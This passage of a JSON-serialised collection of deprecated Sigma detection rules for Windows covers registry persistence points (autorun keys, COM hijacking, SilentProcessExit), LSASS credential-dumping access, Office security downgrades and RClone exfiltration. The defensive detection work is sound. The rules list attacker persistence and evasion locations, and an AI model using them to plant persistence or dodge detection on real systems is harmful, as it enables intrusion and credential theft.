    "content": "title: Sysinternals SDelete Registry Keys\nid: 9841b233-8df8-4ad7-9133-b0b4402a9014\nstatus: deprecated\ndescription: A General detection to trigger for the creation or modification of .*\\Software\\Sysinternals\\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/9\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020/05/02\nmodified: 2023/02/07\ntags:\n    - attack.defense_evasion\n    - attack.t1070.004\nlogsource:\n    product: windows\n    category: registry_add\ndetection:\n    selection:\n        EventType: CreateKey\n        TargetObject|contains: '\\Software\\Sysinternals\\SDelete'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/registry_event_asep_reg_keys_modification.yml",
    "content": "title: Autorun Keys Modification\nid: 17f878b8-9968-4578-b814-c4217fc5768c\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nstatus: deprecated\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\ndate: 2019/10/25\nmodified: 2022/05/14\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton\nlogsource:\n    category: registry_event\n    product: windows\nlevel: medium\ndetection:\n    main_selection:\n        TargetObject|contains:\n            - '\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows CE Services\\AutoStart'\n            - '\\Software\\Wow6432Node\\Microsoft\\Command Processor\\Autorun'\n            - '\\SOFTWARE\\Wow6432Node\\Microsoft\\Active Setup\\Installed Components'\n            - '\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnDisconnect'\n            - '\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnConnect'\n            - '\\SYSTEM\\Setup\\CmdLine'\n            - '\\Software\\Microsoft\\Ctf\\LangBarAddin'\n            - '\\Software\\Microsoft\\Command Processor\\Autorun'\n            - '\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components'\n            - '\\SOFTWARE\\Classes\\Protocols\\Handler'\n            - '\\SOFTWARE\\Classes\\Protocols\\Filter'\n            - '\\SOFTWARE\\Classes\\Htmlfile\\Shell\\Open\\Command\\(Default)'\n            - '\\Environment\\UserInitMprLogonScript'\n            - '\\SOFTWARE\\Policies\\Microsoft\\Windows\\Control Panel\\Desktop\\Scrnsave.exe'\n            - '\\Software\\Microsoft\\Internet Explorer\\UrlSearchHooks'\n            - '\\SOFTWARE\\Microsoft\\Internet Explorer\\Desktop\\Components'\n            - 
'\\Software\\Classes\\Clsid\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\Inprocserver32'\n            - '\\Control Panel\\Desktop\\Scrnsave.exe'\n    session_manager_base:\n        TargetObject|contains: '\\System\\CurrentControlSet\\Control\\Session Manager'\n    session_manager:\n        TargetObject|contains:\n            - '\\SetupExecute'\n            - '\\S0InitialCommand'\n            - '\\KnownDlls'\n            - '\\Execute'\n            - '\\BootExecute'\n            - '\\AppCertDlls'\n    current_version_base:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion'\n    current_version:\n        TargetObject|contains:\n            - '\\ShellServiceObjectDelayLoad'\n            - '\\Run'\n            - '\\Policies\\System\\Shell'\n            - '\\Policies\\Explorer\\Run'\n            - '\\Group Policy\\Scripts\\Startup'\n            - '\\Group Policy\\Scripts\\Shutdown'\n            - '\\Group Policy\\Scripts\\Logon'\n            - '\\Group Policy\\Scripts\\Logoff'\n            - '\\Explorer\\ShellServiceObjects'\n            - '\\Explorer\\ShellIconOverlayIdentifiers'\n            - '\\Explorer\\ShellExecuteHooks'\n            - '\\Explorer\\SharedTaskScheduler'\n            - '\\Explorer\\Browser Helper Objects'\n            - '\\Authentication\\PLAP Providers'\n            - '\\Authentication\\Credential Providers'\n            - '\\Authentication\\Credential Provider Filters'\n    nt_current_version_base:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'\n    nt_current_version:\n        TargetObject|contains:\n            - '\\Winlogon\\VmApplet'\n            - '\\Winlogon\\Userinit'\n            - '\\Winlogon\\Taskman'\n            - '\\Winlogon\\Shell'\n            - '\\Winlogon\\GpExtensions'\n            - '\\Winlogon\\AppSetup'\n            - '\\Winlogon\\AlternateShells\\AvailableShells'\n            - '\\Windows\\IconServiceLib'\n            - '\\Windows\\Appinit_Dlls'\n            - 
'\\Image File Execution Options'\n            - '\\Font Drivers'\n            - '\\Drivers32'\n            - '\\Windows\\Run'\n            - '\\Windows\\Load'\n    wow_current_version_base:\n        TargetObject|contains: '\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion'\n    wow_current_version:\n        TargetObject|contains:\n            - '\\ShellServiceObjectDelayLoad'\n            - '\\Run'\n            - '\\Explorer\\ShellServiceObjects'\n            - '\\Explorer\\ShellIconOverlayIdentifiers'\n            - '\\Explorer\\ShellExecuteHooks'\n            - '\\Explorer\\SharedTaskScheduler'\n            - '\\Explorer\\Browser Helper Objects'\n    wow_nt_current_version_base:\n        TargetObject|contains: '\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion'\n    wow_nt_current_version:\n        TargetObject|contains:\n            - '\\Windows\\Appinit_Dlls'\n            - '\\Image File Execution Options'\n            - '\\Drivers32'\n    wow_office:\n        TargetObject|contains: '\\Software\\Wow6432Node\\Microsoft\\Office'\n    office:\n        TargetObject|contains: '\\Software\\Microsoft\\Office'\n    wow_office_details:\n        TargetObject|contains:\n            - '\\Word\\Addins'\n            - '\\PowerPoint\\Addins'\n            - '\\Outlook\\Addins'\n            - '\\Onenote\\Addins'\n            - '\\Excel\\Addins'\n            - '\\Access\\Addins'\n            - 'test\\Special\\Perf'\n    wow_ie:\n        TargetObject|contains: '\\Software\\Wow6432Node\\Microsoft\\Internet Explorer'\n    ie:\n        TargetObject|contains: '\\Software\\Microsoft\\Internet Explorer'\n    wow_ie_details:\n        TargetObject|contains:\n            - '\\Toolbar'\n            - '\\Extensions'\n            - '\\Explorer Bars'\n    wow_classes_base:\n        TargetObject|contains: '\\Software\\Wow6432Node\\Classes'\n    wow_classes:\n        TargetObject|contains:\n            - '\\Folder\\ShellEx\\ExtShellFolderViews'\n            - 
'\\Folder\\ShellEx\\DragDropHandlers'\n            - '\\Folder\\ShellEx\\ColumnHandlers'\n            - '\\Directory\\Shellex\\DragDropHandlers'\n            - '\\Directory\\Shellex\\CopyHookHandlers'\n            - '\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance'\n            - '\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance'\n            - '\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance'\n            - '\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance'\n            - '\\AllFileSystemObjects\\ShellEx\\DragDropHandlers'\n            - '\\ShellEx\\PropertySheetHandlers'\n            - '\\ShellEx\\ContextMenuHandlers'\n    classes_base:\n        TargetObject|contains: '\\Software\\Classes'\n    classes:\n        TargetObject|contains:\n            - '\\Folder\\ShellEx\\ExtShellFolderViews'\n            - '\\Folder\\ShellEx\\DragDropHandlers'\n            - '\\Folder\\Shellex\\ColumnHandlers'\n            - '\\Filter'\n            - '\\Exefile\\Shell\\Open\\Command\\(Default)'\n            - '\\Directory\\Shellex\\DragDropHandlers'\n            - '\\Directory\\Shellex\\CopyHookHandlers'\n            - '\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance'\n            - '\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance'\n            - '\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance'\n            - '\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance'\n            - '\\Classes\\AllFileSystemObjects\\ShellEx\\DragDropHandlers'\n            - '\\.exe'\n            - '\\.cmd'\n            - '\\ShellEx\\PropertySheetHandlers'\n            - '\\ShellEx\\ContextMenuHandlers'\n    scripts_base:\n        TargetObject|contains: '\\Software\\Policies\\Microsoft\\Windows\\System\\Scripts'\n    scripts:\n        TargetObject|contains:\n            - '\\Startup'\n            - '\\Shutdown'\n            - '\\Logon'\n            - '\\Logoff'\n    winsock_parameters_base:\n        TargetObject|contains: 
'\\System\\CurrentControlSet\\Services\\WinSock2\\Parameters'\n    winsock_parameters:\n        TargetObject|contains:\n            - '\\Protocol_Catalog9\\Catalog_Entries'\n            - '\\NameSpace_Catalog5\\Catalog_Entries'\n    system_control_base:\n        TargetObject|contains: '\\SYSTEM\\CurrentControlSet\\Control'\n    system_control:\n        TargetObject|contains:\n            - '\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram'\n            - '\\Terminal Server\\Wds\\rdpwd\\StartupPrograms'\n            - '\\SecurityProviders\\SecurityProviders'\n            - '\\SafeBoot\\AlternateShell'\n            - '\\Print\\Providers'\n            - '\\Print\\Monitors'\n            - '\\NetworkProvider\\Order'\n            - '\\Lsa\\Notification Packages'\n            - '\\Lsa\\Authentication Packages'\n            - '\\BootVerificationProgram\\ImagePath'\n    filter:\n        - Details: '(Empty)'\n        - TargetObject|endswith: '\\NgcFirst\\ConsecutiveSwitchCount'\n        - Image: 'C:\\WINDOWS\\System32\\svchost.exe'\n    condition: ( main_selection or\n               session_manager_base and session_manager or\n               current_version_base and current_version or\n               nt_current_version_base and nt_current_version or\n               wow_current_version_base and wow_current_version or\n               wow_nt_current_version_base and wow_nt_current_version or\n               (wow_office or office) and wow_office_details or\n               (wow_ie or ie) and wow_ie_details or\n               wow_classes_base and wow_classes or\n               classes_base and classes or\n               scripts_base and scripts or\n               winsock_parameters_base and winsock_parameters or\n               system_control_base and system_control ) and not filter\nfields:\n    - SecurityID\n    - ObjectName\n    - OldValueType\n    - NewValueType\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys 
for legitimate reason\n    - Legitimate administrator sets up autorun keys for legitimate reason\ntags:\n    - attack.persistence\n    - attack.t1547.001"
  },
  {
    "path": "deprecated/windows/registry_set_abusing_windows_telemetry_for_persistence.yml",
    "content": "title: Abusing Windows Telemetry For Persistence - Registry\nid: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5\nstatus: deprecated\ndescription: |\n  Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\n  This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\n  The problem is, it will run any arbitrary command without restriction of location or type.\nreferences:\n    - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/\nauthor: Sreeman\ndate: 2020/09/29\nmodified: 2023/08/17\ntags:\n    - attack.defense_evasion\n    - attack.persistence\n    - attack.t1112\n    - attack.t1053\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\'\n        Details|endswith:\n            - '.sh'\n            - '.exe'\n            - '.dll'\n            - '.bin'\n            - '.bat'\n            - '.cmd'\n            - '.js'\n            - '.ps'\n            - '.vb'\n            - '.jar'\n            - '.hta'\n            - '.msi'\n            - '.vbs'\n    condition: selection\nfields:\n    - EventID\n    - CommandLine\n    - TargetObject\n    - Details\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/registry_set_add_hidden_user.yml",
    "content": "title: User Account Hidden By Registry\nid: 8a58209c-7ae6-4027-afb0-307a78e4589a\nstatus: deprecated\ndescription: Detect modification for a specific user to prevent that user from being listed on the logon screen\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md\nauthor: frack113\ndate: 2022/08/20\nmodified: 2023/08/17\ntags:\n    - attack.defense_evasion\n    - attack.t1564.002\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\\'\n        TargetObject|endswith: '$'\n        Details: DWORD (0x00000000)\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/registry_set_creation_service_uncommon_folder.yml",
    "content": "title: Service Binary in Uncommon Folder\nid: c625c4c2-515d-407f-8bb6-456f65955669\nstatus: deprecated\ndescription: Detect the creation of a service with a service binary located in a uncommon directory\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2022/05/02\nmodified: 2024/03/25\ntags:\n    - attack.defense_evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_1:\n        TargetObject|startswith: 'HKLM\\System\\CurrentControlSet\\Services\\'\n        TargetObject|endswith: '\\Start'\n        Image|contains:\n            - '\\AppData\\Local\\'\n            - '\\AppData\\Roaming\\'\n        Details:\n            - 'DWORD (0x00000000)'  # boot\n            - 'DWORD (0x00000001)'  # System\n            - 'DWORD (0x00000002)'  # Automatic\n            # 3 - Manual , 4 - Disabled\n    selection_2:\n        TargetObject|startswith: 'HKLM\\System\\CurrentControlSet\\Services\\'\n        TargetObject|endswith: '\\ImagePath'\n        Details|contains:\n            - '\\AppData\\Local\\'\n            - '\\AppData\\Roaming\\'\n    filter:\n        - Image|contains:\n              - '\\AppData\\Roaming\\Zoom'\n              - '\\AppData\\Local\\Zoom'\n        - Details|contains:\n              - '\\AppData\\Roaming\\Zoom'\n              - '\\AppData\\Local\\Zoom'\n    condition: 1 of selection_* and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/registry_set_disable_microsoft_office_security_features.yml",
    "content": "title: Disable Microsoft Office Security Features\nid: 7c637634-c95d-4bbf-b26c-a82510874b34\nstatus: deprecated\ndescription: Disable Microsoft Office Security Features by registry\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\n    - https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/\nauthor: frack113\ndate: 2021/06/08\nmodified: 2023/08/17\ntags:\n    - attack.defense_evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: registry_set\n    definition: key must be add to the sysmon configuration to works\n    # Sysmon\n    # <TargetObject name=\"T1562,office\" condition=\"end with\">\\VBAWarnings</TargetObject>\n    # <TargetObject name=\"T1562,office\" condition=\"end with\">\\DisableInternetFilesInPV</TargetObject>\n    # <TargetObject name=\"T1562,office\" condition=\"end with\">\\DisableUnsafeLocationsInPV</TargetObject>\n    # <TargetObject name=\"T1562,office\" condition=\"end with\">\\DisableAttachementsInPV</TargetObject>\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Office\\'\n        TargetObject|endswith:\n            - VBAWarnings\n            - DisableInternetFilesInPV\n            - DisableUnsafeLocationsInPV\n            - DisableAttachementsInPV\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/registry_set_malware_adwind.yml",
    "content": "title: Adwind RAT / JRAT - Registry\nid: 42f0e038-767e-4b85-9d96-2c6335bad0b5\nrelated:\n    - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71\n      type: derived\nstatus: deprecated\ndescription: Detects javaw.exe in AppData folder as used by Adwind / JRAT\nreferences:\n    - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100\n    - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf\nauthor: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community\ndate: 2017/11/10\nmodified: 2024/03/26\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - attack.t1059.007\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run'\n        Details|startswith: '%AppData%\\Roaming\\Oracle\\bin\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/registry_set_office_security.yml",
    "content": "title: Office Security Settings Changed\nid: 9b894e57-033f-46cf-b7fa-a52804181973\nstatus: deprecated\ndescription: Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)\nreferences:\n    - https://twitter.com/inversecos/status/1494174785621819397\n    - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/\n    - https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\nauthor: Trent Liffick (@tliffick)\ndate: 2020/05/22\nmodified: 2023/08/17\ntags:\n    - attack.defense_evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            - '\\Security\\Trusted Documents\\TrustRecords'\n            - '\\Security\\AccessVBOM'\n            - '\\Security\\VBAWarnings'\n    condition: selection\nfalsepositives:\n    - Valid Macros and/or internal documents\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/registry_set_persistence_com_hijacking_susp_locations.yml",
    "content": "title: Potential Persistence Via COM Hijacking From Suspicious Locations\nid: 3d968d17-ffa4-4bc0-bfdc-f139de76ce77\nrelated:\n    - id: 790317c0-0a36-4a6a-a105-6e576bf99a14\n      type: derived\nstatus: deprecated\ndescription: Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a suspicious or unusual location.\nreferences:\n    - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022/07/28\nmodified: 2024/07/16\ntags:\n    - attack.persistence\n    - attack.t1546.015\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\CLSID\\'\n        TargetObject|endswith:\n            - '\\InprocServer32\\(Default)'\n            - '\\LocalServer32\\(Default)'\n        Details|contains: # Add more suspicious paths and locations\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n            - '\\System32\\spool\\drivers\\color\\' # as seen in the knotweed blog\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n            - '%appdata%'\n            - '%temp%'\n            - '%tmp%'\n    condition: selection\nfalsepositives:\n    - Probable legitimate applications. If you find these please add them to an exclusion list\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/registry_set_persistence_search_order.yml",
    "content": "title: Potential Persistence Via COM Search Order Hijacking\nid: a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12\nrelated:\n    - id: 790317c0-0a36-4a6a-a105-6e576bf99a14\n      type: derived\nstatus: deprecated\ndescription: Detects potential COM object hijacking leveraging the COM Search Order\nreferences:\n    - https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/\nauthor: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien\ndate: 2020-04-14\nmodified: 2024-09-02\ntags:\n    - attack.persistence\n    - attack.t1546.015\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection: # Detect new COM servers in the user hive\n        TargetObject|contains: '\\CLSID\\'\n        TargetObject|endswith: '\\InprocServer32\\(Default)'\n    filter_main_generic:\n        Details|contains: # Exclude privileged directories and observed FPs\n            - '%%systemroot%%\\system32\\'\n            - '%%systemroot%%\\SysWow64\\'\n    filter_main_onedrive:\n        Details|contains:\n            # Related To OneDrive\n            - '\\AppData\\Local\\Microsoft\\OneDrive\\'\n            - '\\FileCoAuthLib64.dll'\n            - '\\FileSyncShell64.dll'\n            - '\\FileSyncApi64.dll'\n    filter_main_health_service:\n        Image|endswith: ':\\WINDOWS\\system32\\SecurityHealthService.exe'\n    filter_main_teams:\n        Details|contains|all:\n            - '\\AppData\\Local\\Microsoft\\TeamsMeetingAddin\\'\n            - '\\Microsoft.Teams.AddinLoader.dll'\n    filter_main_dropbox:\n        Details|contains|all:\n            - '\\AppData\\Roaming\\Dropbox\\'\n            - '\\DropboxExt64.*.dll'\n    filter_main_trend_micro:\n        Details|endswith: 'TmopIEPlg.dll' # TrendMicro osce\n    filter_main_update:\n        Image|endswith:\n            - ':\\WINDOWS\\system32\\wuauclt.exe'\n            - ':\\WINDOWS\\system32\\svchost.exe'\n    filter_main_defender:\n        
Image|contains:\n            - ':\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n            - ':\\Program Files\\Windows Defender\\'\n        Image|endswith: '\\MsMpEng.exe'\n    filter_main_nvidia:\n        Details|contains: '\\FileRepository\\nvmdi.inf'\n    filter_main_edge:\n        Image|endswith: '\\MicrosoftEdgeUpdateComRegisterShell64.exe'\n    filter_main_dx:\n        Image|endswith: ':\\WINDOWS\\SYSTEM32\\dxdiag.exe'\n    filter_main_python:\n        Details|endswith:\n            - ':\\Windows\\pyshellext.amd64.dll'\n            - ':\\Windows\\pyshellext.dll'\n    filter_main_bonjourlib:\n        Details|endswith:\n            - ':\\Windows\\system32\\dnssdX.dll'\n            - ':\\Windows\\SysWOW64\\dnssdX.dll'\n    filter_main_printextensionmanager:\n        Details|endswith: ':\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll'\n    filter_main_programfiles:\n        Details|contains:\n            - ':\\Program Files\\'\n            - ':\\Program Files (x86)\\'\n    filter_main_programdata:\n        Details|contains: ':\\ProgramData\\Microsoft\\'\n    filter_main_gameservice:\n        Details|contains: ':\\WINDOWS\\system32\\GamingServicesProxy.dll'\n    filter_main_poqexec:\n        Image|endswith: ':\\Windows\\System32\\poqexec.exe'\n        Details|contains: ':\\Windows\\System32\\Autopilot.dll'\n    filter_main_sec_health_svc:\n        Image|endswith: ':\\Windows\\system32\\SecurityHealthService.exe'\n        Details|contains: ':\\Windows\\System32\\SecurityHealth'\n    filter_main_inprocserver:\n        Image|endswith:\n            - ':\\Windows\\System32\\poqexec.exe'\n            - ':\\Windows\\System32\\regsvr32.exe'\n        TargetObject|endswith: '\\InProcServer32\\(Default)'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/registry_set_silentprocessexit.yml",
    "content": "title: SilentProcessExit Monitor Registration\nid: c81fe886-cac0-4913-a511-2822d72ff505\nstatus: deprecated\ndescription: Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process\nreferences:\n    - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/\n    - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021/02/26\nmodified: 2023/08/17\ntags:\n    - attack.persistence\n    - attack.t1546.012\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit'\n        Details|contains: 'MonitorProcess'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml",
    "content": "title: Accessing WinAPI in PowerShell for Credentials Dumping\nid: 3f07b9d1-2082-4c56-9277-613a621983cc\nstatus: deprecated\ndescription: Detects Accessing to lsass.exe by Powershell\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: oscd.community, Natalia Shornikova\ndate: 2020/10/06\nmodified: 2022/12/18\ntags:\n    - attack.credential_access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    service: sysmon\ndetection:\n    selection:\n        EventID:\n            - 8\n            - 10\n        SourceImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        TargetImage|endswith: '\\lsass.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/sysmon_dcom_iertutil_dll_hijack.yml",
    "content": "title: DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon\nid: e554f142-5cf3-4e55-ace9-a1b59e0def65\nstatus: deprecated\ndescription: Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario.\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga\ndate: 2020/10/12\nmodified: 2022/12/18\ntags:\n    - attack.lateral_movement\n    - attack.t1021.002\n    - attack.t1021.003\nlogsource:\n    product: windows\n    service: sysmon\ndetection:\n    selection_one:\n        EventID: 11\n        Image: System\n        TargetFilename|endswith: '\\Internet Explorer\\iertutil.dll'\n    selection_two:\n        EventID: 7\n        Image|endswith: '\\Internet Explorer\\iexplore.exe'\n        ImageLoaded|endswith: '\\Internet Explorer\\iertutil.dll'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/sysmon_mimikatz_detection_lsass.yml",
    "content": "title: Mimikatz Detection LSASS Access\nid: 0d894093-71bc-43c3-8c4d-ecfc28dcf5d9\nstatus: deprecated\ndescription: Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_ LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_ INFORMATION \"only old\n    versions\", 0x0010 PROCESS_VM_READ)\nreferences:\n    - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow\n    - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html\ntags:\n    - attack.t1003\n    - attack.s0002\n    - attack.credential_access\n    - car.2019-04-004\nauthor: Sherif Eldeeb\ndate: 2017/10/18\nmodified: 2022/04/11\nlogsource:\n    product: windows\n    category: process_access\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        GrantedAccess:\n            - '0x1410'\n            - '0x1010'\n            - '0x410'\n    filter:\n        SourceImage|startswith: \n            - 'C:\\Program Files\\WindowsApps\\'\n            - 'C:\\Windows\\System32\\'\n        SourceImage|endswith: '\\GamingServices.exe'\n    condition: selection and not filter\nfields:\n    - ComputerName\n    - User\n    - SourceImage\nfalsepositives:\n    - Some security products access LSASS in this way.\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/sysmon_powershell_execution_moduleload.yml",
    "content": "title: PowerShell Execution\nid: 867613fb-fa60-4497-a017-a82df74a172c\ndescription: Detects execution of PowerShell\nstatus: deprecated\ndate: 2019/09/12\nmodified: 2021/11/05\nauthor: Roberto Rodriguez @Cyb3rWard0g\nreferences:\n    - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html\ntags:\n    - attack.execution\n    - attack.t1086          # an old one\n    - attack.t1059.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection: \n        Description: 'System.Management.Automation'\n        ImageLoaded|contains: 'System.Management.Automation'\n    condition: selection\nfields:\n    - ComputerName\n    - Image\n    - ProcessID\n    - ImageLoaded\nfalsepositives:\n    - Unknown\nlevel: medium"
  },
  {
    "path": "deprecated/windows/sysmon_rclone_execution.yml",
    "content": "title: RClone Execution\nid: a0d63692-a531-4912-ad39-4393325b2a9c\nstatus: deprecated\ndescription: Detects execution of the RClone utility for exfiltration, as used by various ransomware strains such as REvil, Conti and FiveHands\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nauthor: Bhabesh Raj, Sittikorn S\ndate: 2021/05/10\nmodified: 2022/04/11\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware\n    - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a\n    - https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone\n    - https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html\nfields:\n    - CommandLine\n    - ParentCommandLine\n    - Details\nfalsepositives:\n    - Legitimate RClone use\nlevel: high\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Description: 'Rsync for cloud storage'\n    selection2:\n        CommandLine|contains|all:\n            - '--config '\n            - '--no-check-certificate '\n            - ' copy '\n    selection3:\n        Image|endswith:\n            - '\\rclone.exe'\n        CommandLine|contains:\n            - 'mega'\n            - 'pcloud'\n            - 'ftp'\n            - '--progress'\n            - '--ignore-existing'\n            - 